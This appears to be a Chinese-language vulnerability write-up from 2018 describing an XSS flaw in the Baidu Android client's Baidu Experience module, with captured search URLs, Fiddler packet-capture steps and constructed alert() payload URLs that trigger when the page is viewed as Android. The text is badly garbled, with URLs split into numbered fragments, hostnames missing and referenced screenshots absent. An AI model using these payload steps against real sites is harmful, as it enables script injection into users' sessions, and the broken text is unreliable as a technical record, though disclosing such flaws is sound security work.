百度android客户端百度经验模块输出内容未过滤导致xss

1、网上漏洞验证1）第一个payload 返回界面+第一个payload 返回界面：百度android 客户端输出内容未过滤导致 xss漏洞点在在百度经验模块，文章内容为过滤评价:低位,因为扩大攻击范围需要百度经验发帖,同时首个 xss 发现非我,分析漏洞发现者基础上,进一步发现新的 xss 触发点。2018 年 11 月 26 日星期一在网上找到的百度 Xss-payload：1/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF& ms=12/from=844b/s?wo

2、rd=%E4%BF%AE%E6%94%B9alert%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86&sa=ts_1&ts=4352154&t_kt=0&ie=utf- 8&rsv_t=2715%252BTiab2gfmFre7D4LrEOc0XugajZp1NDgftJON9ulh2LOkP%252Fxj 5szLw&ms=1&rsv_pq=8150081601348093015&ss=100&tj=1&rq=alert%28%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&rqlang=zh&rsv_sug4=4145&oq

3、=alert%28%E 5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF漏洞分析+发现新的 xss 触发点：一1) View-source:/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&ms=12) 查看源码,找到弹出的字符串：“你好，2017“二 复制出 url，并访问以上地址全部来指向百度经验的一篇文章：0/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%

4、40iphone 24_70.0/b 1&tj=travel2_4_0_10_l3&wd=&eqid=897e95ac4d9a6800100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKv jBQPf4-msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogig1/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l3

5、&wd=&eqid=897e95ac4d9a6800100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKvD7ix16xSlXgo5DsX msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogig2/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l4&wd=&eqid=897e95ac4d9a6800100000035b

6、fb5dfa&w_qd=IlPT2AEptyoA_yi9IE jBQPf4-msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogih rl-link-data-url=/album/29697b9173ce6dab23/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l4&wd=&eqid=897e95ac4d9a6800

7、100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKvD7ix16xSlXgo5DsX msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogih点击全文阅读，跳转到了这里：/article/29697b9173ce6dab21de3c5d.html在文中，找到了第一次弹的字符找到了第二次弹的字符发现是一篇 js alert 教程，此时想到 作者是如何进一步利用的？一先查看文章中涉及的 xss 语句，源码发现并未过滤，初步假设:只要能访问到本篇文章，点击后就可以触发二文章标题出自百度经验alert(弹

8、出消息对话框)的用法想到刚才搜索框先输入 1/search?word=+搜索内容构造payload：一/search?word=alert(弹出消息对话框)的用法但发现百度用了模糊搜索search?word=需要找到百度不是模糊搜索,直接可以跳转到此页面,验证了之前的理论,点击指定页面，页面中会包含此界面 id 值，只要文章标题+id 值，应该可以触发 xss抓到的包 url 解码：/s?ie=utf- 8&f=8&rsv_bp=1&tn=baidu&wd=a

9、lert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86)%E7%9A%84%E7%94%A8%E6%B3%95&oq=alert(%25E5%25BC%25B9%2 5E5%2587%25BA%25E6%25B6%2588%25E6%2581%25AF%25E5%25AF%25B9%25E8%25AF%259D%25E6%25A1%2586)%25E7%259A%2584%25E7%2594%25A8%25E6%25B3%2595&rsv_pq=ac6e44ab00012e58&rsv_t=932eVtKEdFu

10、FLAxv9IoyaMKORMC2cFYeB3TUcMxjAKct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0很好” alert( “,为过滤，解析 url 编码alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86)%E7%9A%84%E7%94%A8%E6%B3%95解码后：2url 双编码如下是分析漏洞点的测试步骤，省略众多测试截图,因为全部失败。Payload:/s?ie=utf-8&f=8&rsv_bp=1&tn=b

11、aidu&wd=alert( 弹出消息对话框)&oq=a alert(弹出消息对话框)&rsv_pq=ac6e44ab00012e58&rsv_t=932eVtKEdFuFLAxv9IoyaMKORMC2cFYeB3TUcMx jAKct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0拆分每个参数，方便去掉多余参数漏洞复现 Fiddler 开启抓包，从百度首页搜索 ：alert(弹出消息对话框)的用法二/s?ie=utf-8&mod=1&isbd=1&isid=ABD3E7801A491595&ie=utf-8&

12、f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8% sv_sid=1427_25809_21100_26350_27509&_ss=1&clist=&hsug=&csor=17&pstg=2&_cr1=31751去掉：&oq=alert(弹出消息对话框) Payload:/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=alert(弹出消息对话)&rsv_pq=ac6e44ab00012e58&rsv_

13、t=932eVtKEdFuFLAxv9IoyaMKORMC2cFYeB3TUcMxjA Kct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0访问后未触发 xss此 url 的参数无法利用，继续抓包/link?url=0ko1NVsDLCTL4xanS9o8YZGlEhBGWK_6te0ZBtY6cEJ9hFT8bhHg7XgkE6cQC_v访问后会跳转到：发现直接可以跳转到此页面,验证了之前的理论,点击指定页面，页面中会包含此界构造payload:一/link?wd= a

14、lert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF访问返回：构造失败二刚才抓包时，发现 s 参数于是：url 拼接 link 改成 s/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&e游览器模拟 andriodxss 触发成功漏洞问题：Andriod 客户端输出页面时内容未过滤。漏洞挖掘总结：1）从百度首页搜索 标题2）3）4）分析数据/link?url=an3YJzaNgkZVM6R7fUJrfbqe-5.构造paylaod：htt

15、ps://s?wd=alert(弹出消息&eqid=b3b09c9c0000993b000000025bfba9d4游览器模拟 andriod进一步验证是标题未过滤导致 xss 还是内容未过滤导致 xss：在百度经验找到了另一篇含有 xss 的代码/article/90808022e075f5fd90c80f75.htmlsVNxvQOLkyChU_mIn5NSP9HJyaq4Sfnt2lUyfMaOheuUlHeDSiDc89X2ESQFoG2cKfbvb2uZ nk3j3B7DJS&wd=&eqid=b3b09c9c0000993b000000025bfba9d4标题：杂谈绕过 WAFWeb 应用涉及的代码：通过上面抓包修改参数模拟 android 测试后无法触发：/s?wd=%e6%9d%82%e8%b0%88%e7%bb%95%e8%bf%87WAFWeb%e5%ba%94%e7%94%a8%e9%98%b2%e7%81%ab%e5%a2%99&eqid=d6786e2800011f1f000000025bfbad12会重新跳转到如下界面：验证结论：分析后发现还是需要标题中带有英文字母比如alert, 才能进到指定页面,进一步触发页面中的